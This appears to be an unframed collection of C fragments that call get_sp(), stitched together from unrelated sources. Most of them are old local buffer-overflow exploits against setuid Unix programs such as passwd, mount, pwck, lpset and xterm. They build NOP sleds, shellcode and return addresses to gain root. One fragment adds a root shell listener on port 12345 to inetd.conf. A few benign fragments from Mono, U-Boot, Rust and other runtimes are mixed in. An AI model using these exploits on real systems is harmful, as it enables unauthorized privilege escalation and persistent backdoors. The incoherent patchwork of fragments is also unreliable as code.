main()
{
static char x[11000];
memset(x,'a',10000);
ret_adr=get_sp()-6300;
for (i = 0; i < 5000 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
ret_adr=get_sp() - 10200;
if ((ret_adr & 0xff )==0) ret_adr+=4;
printf("%lx\n",ret_adr);
for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++)
x[OFFSET3+ADJUST+i]=exploit_code[i];
x[10000]=0;
execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert",
"-d",x,"test",(char *) 0);
}
int main(int argc, char *argv[]) {
int bufsize, offset, i, fd;
long *bufptr;
char *ptr, *buffer, *tempbuf;
setenv("TERMCAP", "/tmp/lstermcap", 1);
bufsize=DEFAULT_BUFSIZE;
if (argc > 2) bufsize=atoi(argv[2]);
if (argc > 1) offset=atoi(argv[1]);
else offset=300;
printf("bufsize: %i\noffset: %i\n", bufsize,offset);
if(!(buffer = malloc(bufsize))) {
printf("can't allocate enough memory\n");
exit(0);
}
if(!(tempbuf = malloc(bufsize+strlen(entry1) ))) {
printf("can't allocate enough memory\n");
exit(0);
}
printf("get_sp(): 0x%x\n", get_sp());
printf("get_sp()-offs: 0x%x\n", (get_sp()-offset) );
ptr=buffer;
bufptr = (long *)(buffer+2); /* align */
for (i = 0; i < bufsize; i += 4)
*(bufptr++) = (get_sp()-offset);
for (i = 0; i < (bufsize/2); i++)
buffer[i] = 0x90;
ptr=buffer + ((bufsize/2) - strlen(shellcode)/2);
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i]; //shellcode
ptr=ptr+24;
/* now insert the characters : and \ into the termcap - these are vital */
*(ptr++)=0x3a;
*(ptr++)=0x5c;
snprintf(tempbuf, (bufsize+strlen(entry1)), "%s%s%s", entry1, buffer);
fd = open(filename, O_WRONLY|O_CREAT|O_TRUNC, 0666);
write (fd, tempbuf, strlen(tempbuf));
close(fd);
printf("made termcap\n");
execl("/usr/X11R6/bin/xterm","xterm", 0);
}
/*
* Checks whether get_sp() works as expected. It doesn't work with gcc-2.95.3 on linux.
*/
static gboolean
is_get_sp_reliable (void)
{
void *sp1, *sp2;
reliable_delegate(1);
sp1 = get_sp();
reliable_delegate(1);
sp2 = get_sp();
return sp1 == sp2;
}
LIBTEST_API int STDCALL
mono_test_marshal_delegate (SimpleDelegate delegate)
{
void *sp1, *sp2;
/* Check that the delegate wrapper is stdcall */
delegate (2);
sp1 = get_sp ();
delegate (2);
sp2 = get_sp ();
if (is_get_sp_reliable())
g_assert (sp1 == sp2);
return delegate (2);
}
main()
{
char buf[MAXBUF+1];
unsigned int i,ip,sp;
sprintf(buf,"%s.c",SHELL);
if ((fp=fopen(buf,"w"))==NULL){
printf("Can not write to %s\n",buf);
exit(1);
}
fprintf(fp,"main(){setuid(0);setgid(0);");
fprintf(fp,"system(\"echo 12345 stream tcp nowait root /bin/sh sh -i");
fprintf(fp," >> /etc/inetd.conf; killall -HUP inetd\");}\n");
fclose(fp);
sprintf(buf,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
system(buf);
memset(buf,'a',MAXBUF);
buf[MAXBUF]=0;
strcat(exec,SHELL);
memcpy(buf+300,exec,strlen(exec));
sp=get_sp();
ip=sp+JMP_OFS;
printf("Jumping address = %x\n\n\n",ip);
printf("Please execute following command after \"Segmentation Fault\"\n");
printf("\ntelnet localhost 12345\n\n\n");
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
execl("/usr/jp/canna/bin/canuum","canuum","-k",buf,(char *)0);
}
main(int argc, char *argv[]){
char buf[136];
int i;
int offset=0,*ptr;
long ret;
if(argc!=2){
printf("usage: %s offset\n",argv[0]);
exit(0);}
offset=atoi(argv[1]);
ret=(get_sp()-offset);
for(i=1;i<136;i+=4){
*(long *)&buf[i]=ret;}
printf("\nusing: 0x%x\n\n",ret);
for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
buf[i]=NOP;
memcpy(buf+i,shellcode,strlen(shellcode));
execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);
}
int main (int argc, char **argv) {
int i, slen = strlen(scode), offset = 0;
long ptr, *lptr;
char *buf;
if (argc > 1)
offset = strtoul(argv[1], NULL, 0);
buf = (char *)malloc(1024);
memset(buf, 0, 1024);
for (i = 0; i < (901 - slen); i++)
buf[i] = 0x90;
printf("shellcode length: %d\n", slen);
for (i = (901 - slen); i < 901; i++)
buf[i] = scode[i - (901 - slen)];
lptr = (long *)(buf + 901);
printf("address: 0x%lx\n", ptr = (get_sp() - offset));
for (i = 0; i < 30; i++)
*(lptr + i) = (int)ptr;
execl(_PATH, "nwprint", buf, NULL);
return(0);
}
int main()
{
char cmdBuf[BUFSIZE];
char cmd[BUFSIZE];
int i, j, shellLen;
long addr;
shellLen = strlen(shellcode);
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
for(i=0; i<sizeof(cmdBuf)-shellLen; i++)
cmdBuf[i] = NOP;
printf("I : %d\n", i);
for(j=0; j<shellLen; j++)
cmdBuf[i++] = shellcode[j];
printf("I : %d \n", i);
strcpy(cmd, "`");
strcat(cmd, cmdBuf);
strcat(cmd, "`");
execl(VICTIM, VICTIM, cmd, 0);
}
main()
{
putenv("LANG=");
memset(x,'x',70000);
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/passwd","passwd",(char *)0);
}
int
main(int argc, char *argv[])
{
char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1];
long offset, ret;
int x, y;
if(argc > 2) {
fprintf(stderr, "Usage: %s [offset]\n", argv[0]);
exit(1);
} // end of if..
if(argc == 2) offset = atol(argv[1]);
else offset = 0;
ret = get_sp() + 900 + offset;
for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;
x = BUFFER_SIZE - strlen(shell) - ADJUST;
for(y=0; y<strlen(shell); y++)
buffer[x++] = shell[y];
for(y=0; y<RET_LENGTH; y++, x += 4)
*((int *)&buffer[x]) = ret;
buffer[x] = 0x00;
printf("ret = 0x%x,\n", ret);
printf("offset = %d\n", offset);
printf("buffer size = %d\n", strlen(buffer));
execl("/usr/dt/bin/dtterm", "dtterm", "-xrm", buffer, NULL);
printf("exec failed\n");
}
int main(int argc, char **argv) {
int bsize = 2391;
unsigned long addr;
char *buff;
int i;
if (bsize % 4 != 0) {
bsize = bsize + 4 - (bsize % 4); }
buff = (char *)malloc(bsize);
addr = get_sp();
system("clear");
fprintf(stderr, "pwck exploit..... [email protected]\n\n");
fprintf(stderr, "Mandrake 8.2 sisteminde test edilmistir.\n", addr);
fprintf(stderr, "Buffer: %d\n", bsize);
for(i = 0; i < bsize; i++)
{
*(long *)&buff[i] = 0x90;
}
*(long *)&buff[bsize - 4] = addr;
memcpy(buff + bsize - strlen(shellcode) - 8, shellcode, strlen(shellcode));
execl("/usr/sbin/pwck", "pwck", buff, NULL);
return 0;
}
int
main (int argc, char *argv[])
{
char buffer[BUFSIZE];
int i, offset;
unsigned long ret;
if (argc > 1)
offset = atoi(argv[1]);
else
offset = OFFSET;
for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++)
*(buffer + i) = NOP;
memcpy (buffer + i, blah, strlen (blah));
ret = get_sp();
for (i = i + strlen (blah); i < BUFSIZE; i += 4)
*(long *) &buffer[i] = ret+offset;
fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n");
fprintf(stderr, "[email protected]\n");
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE);
execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
}
int main(int argc, char *argv[]) {
int i, offset=0;
long addr;
char *buf, *ptr;
if(argc > 1) offset = atoi(argv[1]);
buf = (char *)malloc(sizeof(char) * LEN);
bzero(buf, LEN);
addr = get_sp() - offset;
printf("addr: 0x%x, offset: %d\n", addr, offset);
for(i = 0; i < LEN; i += 4) {
*(long *)&buf[i] = addr;
}
for(i = 0; i < (LEN / 2); i++) {
*(buf + i) = NOP;
}
ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
for(i = 0; i < strlen(shell); i++) {
*(ptr++) = shell[i];
}
buf[LEN - 1] = '\0';
execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
return(0);
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),so;
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0);
perror("execl failed");
}
main(int argc, char *argv[]) {
int i,ofs=OFFSET,start=START,end=END;
u_long ret, *ulp;
char *buf;
if (argc > 1) ofs=atoi(argv[1])+8;
if (!(buf = (char *) malloc(BSIZE+2))) {
fprintf(stderr, "out of memory\n");
exit(1);
}
ret = get_sp() - ofs;
for (ulp = (u_long *)buf,i=0; ulp < (u_long *)&buf[BSIZE]; i+=4,ulp++)
*ulp = NOP;
for (i = start, ulp=(u_long *)&buf[start]; i < end; i+=4) *ulp++ = ret;
for (i = 0; i < strlen(sparc_shellcode); i++)
buf[EXSTART+i] = sparc_shellcode[i];
buf[5000]='=';
buf[18000]=0;
fprintf(stderr, "ret: 0x%lx xlen: %d ofs: 0x%lx (%d)\n",
ret, strlen(buf)-2, ofs, ofs);
execl("/usr/bin/lpset","lpset","-n","xfn","-a",&buf[2],"lpcol1",0);
perror("execl");
}
void arch_lmb_reserve(struct lmb *lmb)
{
ulong sp;
/*
* Booting a (Linux) kernel image
*
* Allocate space for command line and board info - the
* address should be as high as possible within the reach of
* the kernel (see CONFIG_SYS_BOOTMAPSZ settings), but in unused
* memory, which means far enough below the current stack
* pointer.
*/
sp = get_sp();
debug("## Current stack ends at 0x%08lx ", sp);
/* adjust sp by 1K to be safe */
sp -= 1024;
/*
* Skip reservation if our stack is not in external RAM
*/
if (sp >= gd->bd->bi_dram[0].start &&
sp < gd->bd->bi_dram[0].start + gd->bd->bi_dram[0].size) {
lmb_reserve(lmb, sp, gd->bd->bi_dram[0].start +
gd->bd->bi_dram[0].size - sp);
}
}
void main(int argc, char **argv)
{
char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char buffer[lv_size + 4 * 8];
unsigned long *ptr2 = NULL;
char *ptr = NULL;
int i;
for (i = 0; i < lv_size + 4 * 8; i++)
buffer[i] = 0x00;
ptr = buffer;
for (i = 0; i < lv_size - strlen(execshell); i++)
*(ptr++) = 0x90;
for (i = 0; i < strlen(execshell); i++)
*(ptr++) = execshell[i];
ptr2 = (long *) ptr;
for (i = 1; i < 2; i++)
*(ptr2++) = get_sp() + offset;
printf("discovered by bloodmask&vio/couin\n"
"coded by plasmoid/thc/deep\n" "for thc-magazine issue #3\n");
(void) alarm((int) 0);
execl("/bin/mount", "mount", buffer, NULL);
}
main()
{
strcat(exec,SHELL);
sprintf(xx,"%s.c",SHELL);
if ((fp=fopen(xx,"w"))==NULL){
printf("Can not write to %s\n",xx);
exit(1);
}
fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
fclose(fp);
sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
system(xx);
sp=get_sp();
memset(xx,NOP,MAXBUF);
ip=sp-JMP_OFS;
printf("Jumping address = %x\n",ip);
xx[RET_ADR ]=ip&0xff;
xx[RET_ADR+1]=(ip>>8)&0xff;
xx[RET_ADR+2]=(ip>>16)&0xff;
xx[RET_ADR+3]=(ip>>24)&0xff;
strncpy(xx+EXP_ADR,exec,strlen(exec));
xx[MAXBUF]=0;
execl("/usr/bin/uum","uum","-D",xx,(char *) 0);
}
main()
{
char buf[BUF_SIZE];
unsigned int esp=get_sp(),sw;
memset(buf,NOP,BUF_SIZE);
memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
strlen(shell_code));
printf("esp=%x\n",esp);
printf("0:Default value 1:Calculated value >");
fflush(stdout);
scanf("%d",&sw);
if (sw==0){
valset(buf+FAKE_OFFSET, FAKE_VALUE);
valset(buf+EIP_OFFSET , EIP_VALUE);
printf("Jumping address = %x\n",EIP_VALUE);
}else{
valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);
}
buf[BUF_SIZE-1]=0;
execl("/usr/dt/bin/dtaction",buf,NULL);
}
int
main (int argc, char *argv[])
{
char buffer[LEN];
int i;
long retaddr = get_sp ();
/*Fill the buffer with our new address to jump to esp + offset */
for (i = 0; i < LEN; i += 4)
*(long *) &buffer[i] = retaddr + atoi (argv[1]);
/*copy the NOPs in to the buffer leaving space for shellcode and
pointers*/
printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);
/*
for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
*(buffer + i) = NOP;*/
/*copy the shell code into the buffer*/
memcpy (buffer + i, shellcode, strlen (shellcode));
execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
}
void main(int argc, char *argv[])
{
int bsize=0, offset=0,i=0,j=0;
char *buff, *ptr;
long long *addr,*addr_ptr;
if (argc == 1)
{
printf("\n\nUsage is either attack [buffer_size]\n or attack [buffer_size] [stack_offset]\n");
exit(0);
}
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
buff = malloc(bsize);
addr = get_sp() -offset;
printf("\nUsing address as guess for beginning of attack buffer: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long long *) ptr;
for (i = 0; i < bsize-8; i+=8)
*(addr_ptr++) = 0xFFFFFFFFFFFFFFFF;
*(addr_ptr)=addr;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = (char*)NULL;
execl("./vuln","./vuln", buff, NULL);
return;
}
/* void main(int argc, char *argv[]) { */
void main() {
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset=OFFSET;
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() -1420 -offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",ORACLE_HOME,1);
setenv("EGG",buff,1);
system(BINARY);
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i<bsize;i+=4)
{
buff[i+ALIGN]=(addr&0x000000ff);
buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
buff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
printf("Jump to 0x%08x\n",addr);
execl("./vulnerable2","vulnerable2",buff,0);
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("xosview exploit by Kossak\n");
printf("try changing the default values if you dont get root now.\n");
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("HOME", buff, 1);
system("/usr/bin/X11/xosview -display 0:0"); /* your IP here */
}
int main (int argc, char *argv[])
{
DWORD sp1, sp2;
WORD c;
int i;
LIN_ADDR b;
struct multiboot_info *mbi;
sp1 = get_sp();
mbi = ll_init();
if (mbi == NULL) {
message("Error in LowLevel initialization code...\n");
l1_exit(-1);
}
message("Starting...");
c = ll_context_save();
message("CX=%x\n",c);
for (i = 0; i < 0x4F000; i++);
dos_mem_init();
b = dos_alloc(BSIZE);
vm86_init(b, BSIZE);
l1_int_bind(0x40, reflect);
l1_int_bind(0x15, reflect);
l1_int_bind(0x10, int0x10);
l1_irq_bind(6, reflect);
l1_irq_bind(15, reflect);
l1_irq_bind(14, reflect);
irq_unmask(6);
irq_unmask(15);
irq_unmask(14);
disk_demo();
sp2 = get_sp();
message("End reached!\n");
message("Actual stack : %lx - ", sp2);
message("Begin stack : %lx\n", sp1);
message("Check if same : %s\n",sp1 == sp2 ? "Ok :-)" : "No :-(");
ll_end();
return 1;
}
/*
Called by landing pads during unwinding to figure out which stack segment we
are currently running on and record the stack limit (which was not restored
when unwinding through __morestack).
*/
void
rust_task::reset_stack_limit() {
uintptr_t sp = get_sp();
while (!sp_in_stk_seg(sp, stk)) {
prev_stack();
assert(stk != NULL && "Failed to find the current stack");
}
}
static void intr_79(struct intr_frame *frame) {
(void)frame;
intr_79_counter += 1;
print_intr_frame("intr 79:", frame);
ac_printf(" ss: %x\n", get_ss());
ac_printf(" sp: %p\n", get_sp());
ac_printf(" intr_79_counter=%d\n", intr_79_counter);
}
int main(int argc, char *argv[])
{
char *buff;
char *egg;
char *ptr;
long *addr_ptr;
long addr;
int bsize = DEFAULT_BUFFER_SIZE;
int eggsize = DEFAULT_EGG_SIZE;
int i;
if(argc > 1) { bsize = atoi(argv[1]); }
if(!(buff = malloc(bsize)))
{
printf("unable to allocate memory for %d bytes\n", bsize);
exit(1);
}
if(!(egg = malloc(eggsize)))
{
printf("unable to allocate memory for %d bytes\n", eggsize);
exit(1);
}
addr = get_sp();
printf("/usr/X11R6/bin/ascdc local exploit.\n");
printf("Coded by The Itch / BsE\n\n");
printf("Using return address: 0x%x\n", addr);
printf("Using buffersize : %d\n", bsize);
ptr = buff;
addr_ptr = (long *) ptr;
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; }
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
{
*(ptr++) = NOP;
}
for(i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
putenv(egg);
memcpy(buff, "RET=", 4);
putenv(buff);
system("/usr/X11R6/bin/ascdc -c $RET");
return 0;
}
oop_t ActivationObj::vector_of_outgoing_arguments(fint argc, bool isImplicitSelf) {
ObjVectorObj* vaddr;
oop_t v = ((ObjVectorObj*) The::addr_of(The::vector_proto))->clone_and_resize(argc, The::oop_of(The::nil_object), &vaddr);
fint beginning_of_args_offset = indexableOrigin() + get_sp() + (isImplicitSelf ? 0 : 1); // sp has already been cut back
fint end_of_args_offset = beginning_of_args_offset + argc;
for (fint i = beginning_of_args_offset; i < end_of_args_offset; ++i) {
vaddr->write_indexable_at( i, read_oop(i) );
}
return v;
}
